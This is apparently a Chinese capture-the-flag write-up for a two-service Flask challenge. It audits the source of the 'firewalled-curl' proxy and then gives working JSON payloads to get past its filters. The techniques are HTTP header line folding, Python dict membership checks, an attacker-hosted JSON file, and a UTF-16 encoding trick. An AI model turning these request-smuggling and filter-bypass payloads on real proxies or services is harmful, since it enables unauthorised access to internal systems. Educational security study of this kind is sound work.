题目描述
给了源码,我们得到一个docker-compose.yml包含两个服务的文件:flag-container 和 firewalled-curl。第二个通过 8000 端口暴露在公网上。它们都是基于apache 的flask应用。
docker-compose.yml:
version: "3.9"
services:
  flag-container:
    build: ./flag-container
    environment:
      - FLAG=ASIS{test-flag}
    restart: always
  firewalled-curl:
    build: ./firewalled-curl
    ports:
      - "8000:80"
    restart: always源码:
flag-container:
#!/usr/bin/env python3
from flask import Flask,request
import requests
import json
import os
app = Flask(__name__)
application = app
flag = os.environ.get('FLAG')
@app.route('/flag')
def index():
	args = request.args.get('args')
	try:
		r = requests.post('http://firewalled-curl/req',json=json.loads(args)).json()
		if 'request' in r and 'flag' in r['request'] and 'flag' in request.headers['X-Request']:
			return flag
	except:
		pass
	return 'No flag for you :('
if(__name__ == '__main__'):
	app.run(port=8000)firewalled-curl:
#!/usr/bin/env python3
from flask import Flask,Response,request
import time
import socket
import re
import base64
import json
isSafeAscii = lambda s : not re.search(r'[^\x20-\x7F]',s)# 匿名函数
isSafeHeader = lambda s : isSafeAscii(s)
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
badHeaderNames = ['encoding','type','charset']
unsafeKeywords = ["flag"]
app = Flask(__name__)
application = app
def isJson(s):
	try:
		json.loads(s)
		return True
	except:
		return False
def checkHostname(name):
	name = str(name)
	port = '80'
	if(':' in name):
		sp = name.split(':')
		name = sp[0]
		port = sp[1]
	if(
		(
		re.search(r'^[a-z0-9][a-z0-9\-\.]+$',name) or
		re.search(r'^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$',name)
		) and
		0 < int(port) < 0x10000
	):
		return name,int(port)
	return Exception('unsafe port'),Exception('unsafe hostname')
def recvuntil(sock,u):
	r = b''
	while(r[-len(u):] != u):
		r += sock.recv(1)
	return r
def checkHeaders(headers):# headers类型为 dict
	newHeaders = {}
	if(type(headers) is not dict):
		return Exception('unsafe headers') 
	for headerName in headers:
		headerValue = str(headers[headerName])# 获得 value
		if((isSafeHeader(headerName) and ':' not in headerName) and isSafeHeader(headerValue)):
			isBad = False
			for badHeaderName in badHeaderNames: # ['encoding','type','charset']
				if(badHeaderName in headerName.lower()):
					isBad = True
					break
			# 这个 waf  !!!!
			for badHeaderValue in unsafeKeywords: # ['flag']
				if(badHeaderValue in headerValue.lower()):
					isBad = True
					break
			if(isBad):
				return Exception('bad headers')
			newHeaders[headerName] = headerValue
	return newHeaders
def checkMethod(method):
	if(method in ['GET','POST']):
		return method
	return Exception('unsafe method')
def checkPath(path):
	if(isSafePath(path)):
		return path
	return Exception('unsafe path')
def checkJson(j):
	if(type(j) == str):
     # 这个 waf  !!!!    json中不能有 flag
		for u in unsafeKeywords:
			if(u in j.lower()):
				return False
	elif(type(j) == list):
		for entry in j:
			if(not checkJson(entry)):
				return False 
	elif(type(j) == dict):
		for entry in j:
			if(not checkJson(j[entry])):
				return False 
	else:
		return True
	return True
@app.route('/req',methods=['POST'])
def req():
	params = request.json
	hostname,port = checkHostname(params['host'])
	headers = checkHeaders(params['headers'])
	method = checkMethod(params['method'])
	path = checkPath(params['path'])
	returnJson = bool(params['returnJson'])
	body = None
	for p in [hostname,headers,body,method,path]:
		if(isinstance(p,Exception)):
			return {'success':False,'error':str(p)}
	if(method == 'POST'):
		body = str(params['body'])
	httpRequest = f'{method} {path} HTTP/1.1\r\n' # /flag?args={}
	if(port == 80):
		httpRequest+= f'Host: {hostname}\r\n'
	else:
		httpRequest+= f'Host: {hostname}:{port}\r\n'
	httpRequest+= f'Connection: close\r\n'
	if(body):
		httpRequest+= f'Content-Length: {str(len(body))}\r\n'
	for headerName in headers:
		httpRequest+= f'{headerName}: {headers[headerName]}\r\n'
	httpRequest += '\r\n'
	if(body):
		httpRequest += body  					# 获取请求体body,是否可以构造?
	httpRequest = httpRequest.encode()
	with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as sock:
		sock.settimeout(1)
		sock.connect((hostname,port))
		sock.sendall(httpRequest)
		statusCode = int(recvuntil(sock,b'\n').split(b' ')[1])
		headers = {}
		line = recvuntil(sock,b'\n').strip()
		while(line):
			headerName = line[:line.index(b':')].strip().decode()
			headerValue = line[line.index(b':')+1:].strip().decode()
			if(isSafeHeader(headerName) and isSafeHeader(headerValue)):
				headers[headerName] = headerValue
			line = recvuntil(sock,b'\n').strip()
		bodyLength = min(int(headers['Content-Length']),0x1000)
		body = b''
		while(len(body) != bodyLength):
			body += sock.recv(1)
		sock.close()
		if(isJson(body.decode())):
			if(not checkJson(json.loads(body.decode()))):
				return {'success':False,'error':'unsafe json'}
			headers['Content-Type'] = 'application/json'
		else:
			headers['Content-Type'] = 'application/octet-stream'
		if(returnJson):
			body = base64.b64encode(body).decode()
			return {'statusCode':statusCode,'headers':headers,'body':body,'req':httpRequest.decode()}
		resp = Response(body)
		resp.status = statusCode
		for headerName in headers:
			for badHeaderName in badHeaderNames: # ['encoding','type','charset']
				if(badHeaderName not in headerName.lower()):
					resp.headers[headerName] = headers[headerName]
		return resp
@app.route('/')
def index():
	resp = Response('hi')
	resp.headers['Content-Type'] = 'text/plain'
	return resp
if(__name__ == '__main__'):
	app.run(port=8000)审计代码没啥好说的,就硬看完事了。
分析
不考虑waf的情况下那flag是这么个流程
firewalled-curl服务---->flag-container服务---->firewalled-curl服务---->访问自己服务器得到返回---->拿到flagfirewalled-curl服务接受我们的 json 输入并将其转换为原始的 http 1.1 请求。flag位于flag-container服务中。我们可以通过firewalled-curl访问它,因为只有firewalled-curl暴露在互联网上。
Tm8gZmxhZyBmb3IgeW91IDoo 是 No flag for you :( 的base64编码,返回的这个 body 就是访问对应 host 的结果
对于 flag-container 要拿到flag我们要达成两个条件
@app.route('/flag')
def index():
	args = request.args.get('args')
	try:
		r = requests.post('http://firewalled-curl/req',json=json.loads(args)).json()
		if 'request' in r and 'flag' in r['request'] and 'flag' in request.headers['X-Request']:
			return flag
	except:
		pass
	return 'No flag for you :('通过 firewalled-curl 访问内网的 flag-container ,发送给 flag-container 的报文的请求头中含有
X-Request:flag,但有wafisSafeAscii = lambda s : not re.search(r'[^\x20-\x7F]',s)# 限制只有可见字符才行 isSafeHeader = lambda s : isSafeAscii(s) isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s badHeaderNames = ['encoding','type','charset'] unsafeKeywords = ["flag"] ... ... def checkHeaders(headers):# headers类型为 dict newHeaders = {} if(type(headers) is not dict): return Exception('unsafe headers') for headerName in headers: headerValue = str(headers[headerName])# 获得 value if((isSafeHeader(headerName) and ':' not in headerName) and isSafeHeader(headerValue)):# 请求头的key不能有 : isBad = False for badHeaderName in badHeaderNames: # ['encoding','type','charset'] if(badHeaderName in headerName.lower()): isBad = True break # 检测请求头key:value中的 值(Value) for badHeaderValue in unsafeKeywords: # ['flag'],值不能有flag字符串 if(badHeaderValue in headerValue.lower()): isBad = True break if(isBad): return Exception('bad headers') newHeaders[headerName] = headerValue return newHeaders请求头对应的
key: value中的value不能含有flag字符串,即X-Request对应的值不能有flag通过
GET传参agrs,然后将其POST给 firewalled-curl服务,得到返回值,得到的这个返回值是个json数据,且json成功解析后要求满足checkJson函数的waf检测,同时在 flag-container 中对应得到的返回值r也要**满足'request' in r and 'flag' in r['request']**但也有waf
... def checkJson(j): if(type(j) == str): # 这个 waf !!!! json中不能有 flag for u in unsafeKeywords: if(u in j.lower()): return False elif(type(j) == list): for entry in j: if(not checkJson(entry)): return False elif(type(j) == dict): for entry in j: if(not checkJson(j[entry])): return False else: return True return True ... ... while(len(body) != bodyLength): body += sock.recv(1) sock.close() if(isJson(body.decode())): if(not checkJson(json.loads(body.decode()))): return {'success':False,'error':'unsafe json'} headers['Content-Type'] = 'application/json' else: headers['Content-Type'] = 'application/octet-stream' if(returnJson):# returnJson 为 True时 body = base64.b64encode(body).decode() return {'statusCode':statusCode,'headers':headers,'body':body,'req':httpRequest.decode()} resp = Response(body) resp.status = statusCode for headerName in headers: for badHeaderName in badHeaderNames: # ['encoding','type','charset'] if(badHeaderName not in headerName.lower()): resp.headers[headerName] = headers[headerName] return resp # resp 的结果要为 {"request":"flag"}, 但有wafcheckJson函数会递归的检查得到的 json 数据的 value 是否含有flag字符串
由于程序会将得到的json中的 host, path 等进行拼接,转成对应的http/1.1 报文然后通过 socket 套接字发送,而发现host ,path 等没有 checkHeaders函数检测 所以尝试在加入字符 \r\n 换行注入这种
GET / HTTP/1.1
Host: example.com
Key: value
body但发现限制了字符集
def checkHostname(name):
	name = str(name)
	port = '80'
	if(':' in name):
		sp = name.split(':')
		name = sp[0]
		port = sp[1]
	if(
		(
		re.search(r'^[a-z0-9][a-z0-9\.-]+$',name) or
		re.search(r'^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$',name)
		) and
		0 < int(port) < 0x10000
	):
		return name,int(port)
	return Exception('unsafe port'),Exception('unsafe hostname')
def checkMethod(method):
	if(method in ['GET','POST']):
		return method
	return Exception('unsafe method')
isSafePath = lambda s : s[0] == '/' and isSafeAscii(s) and ' ' not in s
def checkPath(path):
	if(isSafePath(path)):
		return path
	return Exception('unsafe path')也不行
解决方案
Flask支持接收折叠头部形式的http报文
第一个点用到了这个
参考 RCF 标准文档 https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4
Historically, HTTP header field values could be extended over
multiple lines by preceding each extra line with at least one space
or horizontal tab (obs-fold).  This specification deprecates such
line folding except within the message/http media type
(Section 8.3.1).  A sender MUST NOT generate a message that includes
line folding (i.e., that has any field-value that contains a match to
the obs-fold rule) unless the message is intended for packaging
within the message/http media type.从历史上看,HTTP 头字段值可以扩展到通过在每个额外的行前面至少有一个空格或水平制表符来实现多行折叠的消息头。
即如有这样的报文
GET / HTTP/1.1
Host: example.com
Key: value1
 value2
body服务器最终接受到的请求头 key 是这样的 key: value1 value2
等价于这样的报文
GET / HTTP/1.1
Host: example.com
Key: value1 value2
body而从题目源码来看他从json中获得的请求头并没有考虑这点,所以向 /req 发送这样的json
{
		"host": "flag-container",
		"headers": {
            "X-Request":"something",
			" flag":"aaa"
         },
		"method": "GET",
		"path": "/flag",
		"returnJson": true
}上面也分析到获取到的这个json解析成 dict 后会用 checkHeaders 函数 递归检验 headers 字典内的 value 值,注意其并**不会检验字典的 key **,即请求头的key " flag" 不会被waf。
如上,没有出发waf,程序将整理好的 http/1.1 报文通过socket套接字发送给 flag-container
整理下
GET /flag HTTP/1.1
Host: flag-container
Connection: close
X-Request: something
 flag: aaa
发送给 flag-container 后,flag-container 收到的请求头 request.headers 中就存在这样的请求头 {"X-Request": "something flag:aaa"}
这下 'flag' in request.headers['X-Request'] 的条件就满足了,上面第一个问题就解决了。
为了更好的理解,本地测试下
from flask import Flask,request
app = Flask(__name__)
@app.route('/flag')
def index():
    print(request.headers)
    
if(__name__ == '__main__'):
	app.run(port=8000)还是上面的 http 报文,结果
可以发现符合预期,"flag" in request.headers["X-Request"] 满足
python in 关键字的特性
python中的 in 关键字用于检测某个值是否存在于指定的值中,如
"abc" in "aabc123" ,"qwe" in ["aaa", "qwe", "123"],均返回 True
对于 dict 类型的变量,in 关键字有有这样的特性
testDict = {"key1": "value1", "key2": "value2"}
print("key1" in testDict)
print("value1" in testDict)
print("value1" in testDict["key1"])运行结果
in 若用于字典类型数据,则是检测目标字典中是否存在对应的 key 值。
所以对于上面 分析 中的条件2则可以构造得到的 r 为 {"request": {"flag":"aaa"}}
这样满足 'request' in r and 'flag' in r['request']
最后可以在自己服务器上搭建返回 {"request": {"flag":"aaa"}} 即可
exp.json
{"request": {"flag":"aaa"}}对 flag-container 的args传参
args={"host":"own_server","headers":{},"method":"GET","path":"/exp.json","returnJson":false}注意要 url 编码一下
args=%7B%22host%22%3A%22own_server%22%2C%22headers%22%3A%7B%7D%2C%22method%22%3A%22GET%22%2C%22path%22%3A%22%2Fexp.json%22%2C%22returnJson%22%3Afalse%7D最终的payload
post 发送给 /req
{
		"host": "flag-container",
		"headers": {"X-Request":"something",
" flag":"aaa"},
		"method": "GET",
		"path": "/flag?args=%7B%22host%22%3A%22own_server%22%2C%22headers%22%3A%7B%7D%2C%22method%22%3A%22GET%22%2C%22path%22%3A%22%2Fexp.json%22%2C%22returnJson%22%3Afalse%7D",
		"returnJson": false
	}后记
这题第二个条件本文说的其实是一个非预期的解法,预期解是更改JSON文件的编码。如果使用非utf-8编码,则来自 frewalled-curl 的 isJson 函数在 try{} catch {} 中会失败。
使用这样的命令获取 utf-16.json 文件
echo {"request":"flag"} > secret.json
iconv -f ASCII -t UTF-16 secret.json -o secret_utf16.json之后需要删除前 2 个 byte-order-mark 字节,以便 body.decode() 不会失败。来自 flag-container 的 Response.json()仍然会正确猜测编码 (https://github.com/psf/requests/blob/main/requests/utils.py#L950) 但是 firewalled-curl 中会检测 json 失败。






